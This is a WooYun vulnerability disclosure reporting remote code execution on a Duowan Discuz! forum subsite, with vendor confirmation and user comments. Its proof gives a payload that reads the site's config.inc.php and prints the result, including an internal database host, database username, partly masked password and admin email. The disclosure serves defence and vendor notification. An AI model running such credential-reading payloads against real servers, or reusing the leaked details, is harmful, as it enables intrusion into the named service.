当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(49) 关注此漏洞

缺陷编号: WooYun-2014-80879

漏洞标题: 多玩某分站存在远程代码执行漏洞

相关厂商: 广州多玩

漏洞作者: 猪猪侠认证白帽子

提交时间: 2014-10-26 17:57

公开时间: 2014-12-10 17:58

漏洞类型: 应用配置错误

危害等级: 高

自评Rank: 20

漏洞状态: 厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 help@wooyun.org

Tags标签: 配置错误

7人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2014-10-26: 细节已通知厂商并且等待厂商处理中
2014-10-27: 厂商已经确认,细节仅向厂商公开
2014-11-06: 细节向核心白帽子及相关领域专家公开
2014-11-16: 细节向普通白帽子公开
2014-11-26: 细节向实习白帽子公开
2014-12-10: 细节向公众公开

简要描述:

多玩某分站远程代码执行漏洞

详细说明:

code 区域
影响网站:
http://yaoguobbs.duowan.com



mask 区域
*****���*****
1.http://**.**.**/dzvul/sodb/19/sodb-2010-01.txt



漏洞证明:

cmd.png





cmd=echo readfile('./config.inc.php');



code 区域
<?php

/*
[Discuz!] (C)2001-2006 Comsenz Inc.
This is NOT a freeware, use is subject to license terms

$RCSfile: config5.inc.php,v $
$Revision: 1.1 $
$Date: 2007/11/10 04:06:46 $
*/

// [CH] 以下变量请根据空间商提供的账号参数修改,如有疑问,请联系服务器提供商

$dbhost = '10.20.**.**:6301'; // 数据库服务器
$dbuser = 'net_wgbbs_rw'; // 数据库用户名
$dbpw = '0Sk*****9ir'; // 数据库密码
$dbname = 'wgbbs'; // 数据库名
$pconnect = 0; // 数据库持久连接 0=关闭, 1=打开

// [CH] 如您对 cookie 作用范围有特殊要求, 或论坛登录不正常, 请修改下面变量, 否则请保持默认

$cookiepre = 'wgbbs_'; // cookie 前缀
$cookiedomain = 'duowan.com'; // cookie 作用域
$cookiepath = '/'; // cookie 作用路径

// [CH] 论坛投入使用后不能修改的变量

$tablepre = 'club_'; // 表名前缀, 同一数据库安装多个论坛请修改此处

// [CH] 小心修改以下变量, 否则可能导致论坛无法正常使用

$database = 'mysql'; // 论坛数据库类型,请勿修改
$dbcharset = ''; // MySQL 字符集, 可选 'gbk', 'big5', 'utf8', 'latin1', 留空为按照论坛字符集设定

$charset = 'utf-8'; // 论坛页面默认字符集, 可选 'gbk', 'big5', 'utf-8'
$headercharset = 0; // 强制论坛页面使用默认字符集,可避免部分服务器空间页面出现乱码,一般无需开启。 0=关闭 1= 开启

$tplrefresh = 1; // 论坛风格模板自动刷新开关 0=关闭, 1=打开。

// [CH] 论坛安全设置, 调整以下设置,可以增强论坛的安全性能和防御性能

$adminemail = 'zhoushu@chinaduo.com'; // 系统管理员 Email

修复方案:

更改php.ini

设置: request_order为GPC

版权声明:转载请注明来源 猪猪侠@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:18

确认时间:2014-10-27 21:49

厂商回复:

感谢对于欢聚时代安全工作的支持,我们会尽快修复

最新状态:

暂无


漏洞评价:

对本漏洞信息进行评价,以更好的反馈信息的价值,包括信息客观性,内容是否完整以及是否具备学习价值

漏洞评价(少于3人评价):
登陆后才能进行评分
100%
0%
0%
0%
0%

评价

  1. 2014-10-26 18:00 | 健宇 ( 普通白帽子 | Rank:171 漏洞数:15 )
    1

    你关注的白帽子 猪猪侠 发表了漏洞 多玩某分站远程代码执行漏洞

  2. 2014-10-26 18:02 | 咖啡 ( 实习白帽子 | Rank:58 漏洞数:22 )
    0

    你关注的白帽子 猪猪侠 发表了漏洞 多玩某分站远程代码执行漏洞

  3. 2014-10-26 18:14 | 龍 、 ( 普通白帽子 | Rank:474 漏洞数:163 | 你若安好 我就是晴天)
    0

    你关注的白帽子 猪猪侠 发表了漏洞 多玩某分站远程代码执行漏洞

  4. 2014-10-26 19:32 | 第四维度 ( 实习白帽子 | Rank:90 漏洞数:45 | 将点成线...)
    0

    敢不敢说是strust2

  5. 2014-10-26 20:51 | c0nt ( 路人 | Rank:16 漏洞数:7 )
    0

    你关注的白帽子 猪猪侠 发表了漏洞 多玩某分站远程代码执行漏洞

  6. 2014-10-27 08:43 | backtrack丶yao ( 普通白帽子 | Rank:298 漏洞数:110 )
    0

    你关注的白帽子 猪猪侠 发表了漏洞 多玩某分站远程代码执行漏洞

  7. 2014-10-27 09:17 | sky ( 实习白帽子 | Rank:94 漏洞数:35 | 有一天,我带着儿子@jeary 去@园长 的园长...)
    0

    你关注的白帽子 猪猪侠 发表了漏洞 多玩某分站远程代码执行漏洞

  8. 2014-10-27 11:50 | Cyrils ( 实习白帽子 | Rank:47 漏洞数:11 | the more the better)
    0

    你关注的白帽子 猪猪侠 发表了漏洞 多玩某分站远程代码执行漏洞

  9. 2014-10-27 15:56 | 梧桐雨 认证白帽子 ( 核心白帽子 | Rank:1643 漏洞数:189 | 学无止境)
    0

    @第四维度 这是discuz命令执行,非st2

  10. 2014-10-27 17:42 | 哦哦 ( 路人 | Rank:2 漏洞数:1 | 好123,最好的导航,没有之一)
    0

    你关注的白帽子 猪猪侠 发表了漏洞 多玩某分站远程代码执行漏洞

  11. 2014-10-27 18:59 | 0c0c0f ( 实习白帽子 | Rank:50 漏洞数:16 | My H34rt c4n 3xploit 4ny h0les!)
    0

    你关注的白帽子 猪猪侠 发表了漏洞 多玩某分站远程代码执行漏洞

  12. 2014-10-28 09:34 | ppt ( 路人 | Rank:11 漏洞数:2 | ) | ( 我猜出了用户名,可我没猜出密码。)
    0

    discuz命令执行,牛b

  13. 2014-10-28 09:54 | Zion! ( 路人 | Rank:4 漏洞数:1 | 小菜鸟 学习....)
    0

    你关注的白帽子 猪猪侠 发表了漏洞 多玩某分站远程代码执行漏洞

  14. 2014-10-28 21:15 | 山羊 ( 路人 | Rank:0 漏洞数:1 | 暂无)
    0

    discuz命令执行???

  15. 2014-11-09 21:10 | izj ( 路人 | Rank:7 漏洞数:3 | 爱老婆)
    1

    你关注的白帽子 猪猪侠 发表了漏洞 多玩某分站远程代码执行漏洞

  16. 2014-11-26 20:09 | 山羊 ( 路人 | Rank:0 漏洞数:1 | 暂无)
    1

    @猪猪侠 能加个Q吗?99043846 有事谈

登录后才能发表评论,请先 登录